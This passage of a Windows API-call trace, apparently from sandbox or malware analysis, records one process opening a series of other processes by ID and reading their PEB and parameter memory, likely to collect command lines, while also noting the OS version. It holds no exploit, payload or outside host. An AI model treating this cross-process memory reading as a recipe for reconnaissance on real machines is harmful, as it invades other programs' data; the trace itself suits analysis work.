[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432a50, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.822] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4327e6, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.823] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.824] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.824] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x431f40, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] malloc (_Size=0xa4) returned 0x2c1680
[0411.825] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x432852, lpBuffer=0x2c1680, nSize=0xa2, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.825] free (_Block=0x2c1680)
[0411.826] CloseHandle (hObject=0x24c) returned 1
[0411.827] _ui64tow (_Value=0x978, _Buffer="1832", _Radix=10) returned="2424"
[0411.832] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2424") returned 4
[0411.833] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.833] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.856] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x24c
[0411.856] GetLastError () returned 0x0
[0411.856] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d2910, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.856] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d26ea, lpBuffer=0x12dd100, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.857] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.857] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.857] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.857] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.858] malloc (_Size=0x6e) returned 0x2c1680
[0411.858] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4d2750, lpBuffer=0x2c1680, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.858] free (_Block=0x2c1680)
[0411.858] CloseHandle (hObject=0x24c) returned 1
[0411.858] _ui64tow (_Value=0x980, _Buffer="2424", _Radix=10) returned="2432"
[0411.861] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2432") returned 4
[0411.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.884] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x980) returned 0x24c
[0411.884] GetLastError () returned 0x0
[0411.884] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.884] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c26fa, lpBuffer=0x12dd100, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.885] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.886] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.886] malloc (_Size=0x70) returned 0x2c1680
[0411.886] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4c2762, lpBuffer=0x2c1680, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1680*, lpNumberOfBytesRead=0x0) returned 1
[0411.887] free (_Block=0x2c1680)
[0411.887] CloseHandle (hObject=0x24c) returned 1
[0411.888] _ui64tow (_Value=0x988, _Buffer="2432", _Radix=10) returned="2440"
[0411.893] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2440") returned 4
[0411.894] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.894] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x24c
[0411.915] GetLastError () returned 0x0
[0411.915] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.916] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x5126f0, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.917] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.917] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x511ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] malloc (_Size=0x8a) returned 0x2e1a70
[0411.918] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x512772, lpBuffer=0x2e1a70, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.918] free (_Block=0x2e1a70)
[0411.918] CloseHandle (hObject=0x24c) returned 1
[0411.948] _ui64tow (_Value=0x990, _Buffer="2440", _Radix=10) returned="2448"
[0411.950] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2448") returned 4
[0411.951] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x22f, dwBuildNumber=0x0, dwPlatformId=0x128260, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.951] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.976] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x990) returned 0x24c
[0411.976] GetLastError () returned 0x0
[0411.976] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0411.976] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.976] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0411.977] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x322930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.978] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x3226e6, lpBuffer=0x12dd100, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0411.979] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0411.980] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0411.980] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0411.980] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x321ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0411.982] malloc (_Size=0x7a) returned 0x2e3a70
[0411.982] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x322758, lpBuffer=0x2e3a70, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3a70*, lpNumberOfBytesRead=0x0) returned 1
[0411.982] free (_Block=0x2e3a70)
[0411.983] CloseHandle (hObject=0x24c) returned 1
[0411.983] _ui64tow (_Value=0x998, _Buffer="2448", _Radix=10) returned="2456"
[0412.129] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2456") returned 4
[0412.130] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.130] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x998) returned 0x24c
[0412.155] GetLastError () returned 0x0
[0412.155] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.155] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.156] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2960, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.156] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e26e6, lpBuffer=0x12dd100, nSize=0x82, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.157] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.158] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.158] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.158] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.159] malloc (_Size=0x8a) returned 0x2e1b10
[0412.159] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4e2768, lpBuffer=0x2e1b10, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e1b10*, lpNumberOfBytesRead=0x0) returned 1
[0412.159] free (_Block=0x2e1b10)
[0412.160] CloseHandle (hObject=0x24c) returned 1
[0412.161] _ui64tow (_Value=0x9a0, _Buffer="2456", _Radix=10) returned="2464"
[0412.166] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2464") returned 4
[0412.168] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.168] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.199] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a0) returned 0x24c
[0412.199] GetLastError () returned 0x0
[0412.199] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.199] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.200] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb26e0, lpBuffer=0x12dd100, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.201] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.202] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.202] malloc (_Size=0x66) returned 0x2c0800
[0412.202] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0xb273e, lpBuffer=0x2c0800, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0412.203] free (_Block=0x2c0800)
[0412.203] CloseHandle (hObject=0x24c) returned 1
[0412.204] _ui64tow (_Value=0x9a8, _Buffer="2464", _Radix=10) returned="2472"
[0412.208] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2472") returned 4
[0412.210] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.210] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.231] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9a8) returned 0x24c
[0412.232] GetLastError () returned 0x0
[0412.232] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b2970, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.232] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b26fc, lpBuffer=0x12dd100, nSize=0x80, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0412.233] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0412.234] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0412.234] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.234] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0412.235] malloc (_Size=0x88) returned 0x2e3b00
[0412.235] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x4b277c, lpBuffer=0x2e3b00, nSize=0x86, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2e3b00*, lpNumberOfBytesRead=0x0) returned 1
[0412.235] free (_Block=0x2e3b00)
[0412.236] CloseHandle (hObject=0x24c) returned 1
[0412.237] _ui64tow (_Value=0x9b0, _Buffer="2472", _Radix=10) returned="2480"
[0412.241] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2480") returned 4
[0412.244] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0412.244] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0412.327] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x24c
[0412.328] GetLastError () returned 0x0
[0412.328] NtQueryInformationProcess (in: ProcessHandle=0x24c, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0412.329] ReadProcessMemory (in: hProcess=0x24c, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
